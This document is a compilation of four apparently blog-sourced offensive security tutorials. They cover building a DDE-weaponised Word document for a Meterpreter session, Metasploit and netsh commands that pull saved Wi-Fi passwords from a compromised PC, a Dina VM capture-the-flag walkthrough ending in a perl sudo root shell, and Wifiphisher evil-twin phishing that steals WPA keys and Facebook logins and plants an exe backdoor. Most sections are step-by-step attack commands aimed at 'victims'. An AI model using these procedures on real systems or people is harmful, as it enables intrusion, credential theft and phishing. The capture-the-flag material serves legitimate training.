Exploiting Windows Machine with DDE Exploit

DDE stands for “dynamic Data Exchange”, this is a method used by windows to facilitate one program being able to subscribe to an item made using another program. This exploit uses that functionality to exploit the victim endpoint. Once the victim clicks on the word file, a HTA payload is retrieved via HTTP and session is achieved.

Here is a step-by-step depiction of how it happens:

The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension, you can name it anything you like, to avoid any confusion, ours is names “dde_delivery.rb”. This file has to now be moved into the windows section of the exploit folder in Metasploit, you can find the path and exploit URL below.

Exploit URL - https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Path of windows folder in Kali – usr > share > metasploit-framework > modules > exploits > windows

Here is what the exploit being pasted into the “windows” folder will look like.

Now open terminal and start Metasploit, once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, this is the host IP. Once the exploit loads, type “set srvhost” followed by your IP, you can see what that would look like in the screenshot given below.

Press enter and you’re all set.

Type “exploit” and press Enter.

You will see a code generated, it has been highlighted in the screenshot given below. Copy this code.

NOTE: Do not close the terminal, it must remain active throughout.

Open Microsoft Word, navigate to the “Insert” tab, under the “Text” section you will find “Quick Parts”, click on it and in the drop menu you will see “Field…”

Click on “Field…”, another windows will appear, by default it will look like the screenshot pasted below, click OK

Once you click on OK, a text will appear “!Unexpected End of Formula”, select this text and right click on it, in the menu choose option “Toggle Field Codes”.

Once this is done, the text will change to “{  =\* MERGEFORMAT } “

Paste the code you copied from Metasploit within the “{ }”, as seen below.

Save the file in a “.docx” format, you can name it anything you like and close Microsoft Word.

You now have a handy word file that can be opened on a Windows 10 machine to achieve session.

Here is what it looks like when the word file is opened:

Once the word file is opened, you will see the following message, click “Yes”.

Next this message will appear. Again, click “Yes”

Finally this message will appear, click “OK”

Now go back to the terminal in kali for the good part.

You will see that the moment OK is clicked in the image above, Meterpreter will come online and you will have achieved session just like that!!

If in case you were wondering why at the beginning we made you manually copy the code into Leafpad and save it into Metasploit, it’s because this is a new exploit and has not been updated into the Metasploit database.

Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

Most of the Security protocols of Wi-Fi networks are often broken or bypassed exposing the wireless internet traffic to attackers. Through this article one can learn about different ways to get basic service sets information of remote user’s Wi-Fi as well as current network connection information, and how to extract saved Wireless LAN profiles of remote pc after that you will be disconnecting target user’s Wi-Fi too. All the following attacks are post exploitation attacks.

Table of Content

• Introduction
• Working of Wi-Fi
• Types of Wi-Fi security
• WLAN BSS List
• WLAN Current Connection
• WLAN Profile
• WLAN Disconnect
• Mimikatz
• Netsh

Introduction

All the wireless networking technology are commonly known as Wi-Fi. It provides high speed internet as it works on radio waves. Wi-Fi trademark is owned by the company the Wi-Fi Alliance; it officially defined as Wireless Local Area Network (WLAN). It is supported by many applications and devices such as mobile phones, PSAs, OS, Video game consoles, etc. therefore, it lets all the devices to communicate easily.

Working of Wi-Fi

As the name suggests, Wi-Fi network has no physical connection between sender and receiver. It uses radio frequency within the electromagnetic spectrum associated with radio waves. Therefore, it is able to provided high speed internet. Every Wi-Fi connection works through a Access Point (AP). The main job of an access point is to broadcast the signal that is further detected by electronic devices. ones the signal is detected they connect to the Wi-Fi in order to use Wi-Fi.

Types of Wi-Fi security

• Wired Equivalent Privacy
• Wi-Fi Protected Access
• Wi-Fi protected Access 2

Netsh

Now that you have session of the victim’s PC, go to the shell and use the following command to find out the wi-fi connections of victims’ PC over the time ;

netsh wlan show profiles

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you SSID and other important  information regarding wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

As the above image shows, till date the PC was connected to the Pentest Lab, Sinos, POCO PHONE, ignit. Now, we can use the following to gain the detailed information about the network :

netsh wlan show networks mode=bssid

Now, use the following command to see the password of a particular wi-fi :

netsh wlan show profile name=”ignit” key=clear

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

this will give you entire wireless connection list with passwords as well.  VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared

Hack the dina VM (CTF Challenge)

Today we are going to take another CTF challenge Dina. The credit for making this VM machine goes to “Touhid Shaikh” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

1.      Scanning

·         Netdiscover

·         NMAP

2.      Enumeration

·         NMAP

·         Web Directory search 

3.      Exploitation

·         Metasploit

4.      Privilege Escalation

·         Exploiting Sudo rights

Walkthrough: 

Scanning:

Let’s start of by scanning the network and identifying host IP address. We can identify our host IP as 192.168.43.219 by using Netdiscover.

netdiscover

Then as usual we used our favorite tool Nmap for port enumeration. We found that port 80 is open.

nmap  –A 192.168.43.219

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

Also in the nmap scan we found the robots.txt directory, so we tried to open it in the browser.

Inside the robots.txt directory we found the names of multiple directories, so we tried to open each one of them one by one but found /nothing directory useful to us.

The source code of /nothing directory revealed some passwords which were useful later.

We have got the passwords so we used dirb to find out any further directories where we could use these passwords. We found a directory named /secure.

dirb http://192.168.43.219

In the /secure directory there is a zip file named backup.zip. We download the file in our kali machine.

When we tried to extract the zip file it was password protected, so we tried all the passwords found above and freedom was the correct one.

Now after we extract the file we find an mp3 file. We checked the file type and found out it is actually an ASCII file. We opened it and got a username touhid and a name of directory /SecreTgatwayLogin.

file backup-cred.mp3

cat backup-cred.mp3

We opened the directory in the browser and got a playSMS login page. We put in the username touhid and tried the password from the above found list and diana worked for us.

Exploitation:

In the exploitation phase we looked for any exploit of playSMS web-application in the metasploit and found two exploits.

search playsms

We used the second exploit in which we are uploading our payload using a csv file.

We put in the required fields and used touhid and diana as username and password.

use exploit/multi/http/playsms_uploadcsv_exec

set rhost 192.168.43.219

set lhost 192.168.43.171

set lport 4444

set username touhid

set password Diana

set targeturi /SecreTgatwayLogin

exploit

After running the exploit, we successfully got a metrepreter session and the used python one liner to get a proper shell.

On checking the sudo permissions for the www-data user, it had a sudo permission to run perl.

getuid

shell

python -c 'import pty; pty.spawn("/bin/sh")'

sudo -l

Privilege Escalation:

To elevate to root privileges we exploited the sudo permissions of perl and successfully got the root shell. And then traversed to the root directory and found the flag.txt file.

sudo /usr/bin/perl –e “exec ‘/bin/sh’”

whoami

cd /root

ls

cat flag.txt

WiFi Exploitation with WifiPhisher

Hello friends! Today we are going demonstrate WIFI- Phishing attack by using very great tool “WIFIphisher”, please read its description for more details.

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malwares. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement

·         Kali Linux.

·         Two wifi adapter; one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

1.       Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging “Deauthenticate” or “Disassociate” packets to disrupt existing associations.

2.       Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs "known" open networks to cause automatic association.

3.       Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malwares. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

Let’s start!!!

Open the terminal in your Kali Linux and type following command for downloading wifiphisher from git hub.

git clone https://github.com/wifiphisher/wifiphisher.git

Once it get downloaded run python file to install its setup and dependency as shown below:

cd wifiphisher/

python setup.py install

Now run the script by typing wifiphisher on terminal to launch wifi-phishing attack which as similar as social engineering.

Here it will fetch all interfaces as shown in given image and let attacker to choose any one ESSID/BSSID of the target network and try to trap victim by performing phishing. It will also perform both Evil Twin and KARMA attacks.

From list of interface, I had targeted “iball-baton” to trap the victim connect from it.

After than you will get 4 phishing scenarios to trap your target as given below:

1.       Firmware Upgrade page

2.       Network Manager connect

3.       Browser plugin update

4.       Oauth login Page

Now let’s go through each phishing scenario one by one starting from 1^st option.

Firmware Upgrade page: A router configuration page without logos or brands asking for WPA/WPA2 password due to a Firmware Upgrade page.

Now when victim will open his browser Firefox he will get a phishing page to upgrade firmware that need WPA/WPA2 password for installing new version of firmware.

The victim may consider it as an official notification and go for upgrading by submitting his WIFI password. As the victim enter the password for WPA/WPA2 and click on start upgrade, he will get trap into fake upgrade process.  

Following image is pretending to the victim that firmware is being upgrade don’t close the process until it completed while at background the attacker has captured the WPA/WPA2 password.

Great!! You can confirm the WPA/WPA2 password as shown in given below image, it is showing WPA –password: ram123456ram

Once again repeat the same step to select ESSID.

Now let us go through another phishing scenario from 2^nd option.

Network Manager Connect: Imitates the behavior of the network manager. This templates show’s chrome “connection Failed” page and displays a network manager window through the page asking for pre=shared key. Currently, the network managers of windows and Mac Os are supported.  

Now when the victim will open browser he will get a fake page for “connection failed” and more over a fake window for network manager.

Here target will click on “connect” to reconnect with interface.

It asks to enter the password for connection with selected interface while at background the attacker will captured the WPA/WPA2 password. 

Great!!  Again you can confirm the WPA/WPA2 password as shown in given below image, it has captured WPA –password: ram123456ram

Repeat same step to choose ESSID for attack.

Browser plugin update: A generic browser plugin update page that can be used to serve payloads to the victims.

It will create an exe payload and run multi handler in background for reverse connection of victim system.

Now when again victim will open browser he will get another fake page for Update plugins as shown in given image where it recommended to update the flash player which is outdated. 

Now when the victim will click on Update Now, it will start downloading an update.exe file into victim’s system which is nothing but an exe backdoor file for making unauthorized access in his system.

Awesome!! Attacker will get reverse connection of target’s system, from given below image you can see it has open meterpreter session 1.

Repeat same step to choose ESSID for attack.

Now move forward with its last option i.e. 4^th option.

OAuth Login Page: A free WI-FI service asking for facebook credential to authenticate using OAuth.

At this time when victim will open browser he may get trap into phishing page set as “Get Connect to the Internet For free” as shown in given image.

So when victim will enter his facebook credential for accessing free internet he will get trap in that phishing attack.

Here you can see as victim enters username with password and click on login for facebook connection he got an error message mean while attacker has capture victim’s facebook credential.

Wonderful!! Attacker successfully traps the victim and fetched his facebook account credential.